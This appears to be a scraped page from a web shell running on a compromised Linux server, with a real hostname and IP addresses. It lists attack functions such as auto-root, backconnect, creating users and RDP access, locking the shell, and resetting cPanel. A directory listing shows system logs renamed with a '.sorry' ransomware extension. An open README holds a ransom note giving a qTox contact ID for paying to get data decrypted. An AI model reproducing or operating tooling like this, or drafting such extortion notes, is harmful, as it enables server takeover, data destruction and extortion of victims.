Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
log /
anaconda /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
404
B
-rw-r--r--
anaconda.log.sorry
13.47
KB
-rw-r--r--
ifcfg.log.sorry
6.86
KB
-rw-r--r--
journal.log.sorry
1.91
MB
-rw-r--r--
ks-script-Gveeiw.log.sorry
3.22
KB
-rw-r--r--
ks-script-_iZWtC.log.sorry
2.26
KB
-rw-r--r--
ks-script-gaEToF.log.sorry
2.26
KB
-rw-r--r--
ks-script-nXPfI9.log.sorry
2.26
KB
-rw-r--r--
packaging.log.sorry
165.53
KB
-rw-r--r--
program.log.sorry
43.04
KB
-rw-r--r--
storage.log.sorry
85.16
KB
-rw-r--r--
syslog
173.89
KB
-rw-------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
Please contact us through the qtox tool Download qtox https://github.com/qTox/qTox/blob/master/README.md#qtox If you can't contact us, please contact some data recovery company(suggest taobao.com), may they can contact to us. Add our TOX ID and send an encrypted file and 'Sorry-ID' for testing decryption. Our TOX ID: 3D7889AEC00F2325E1A3FBC0ACA4E521670497F11E47FDE13EADE8FED3144B5EB56D6B198724
Close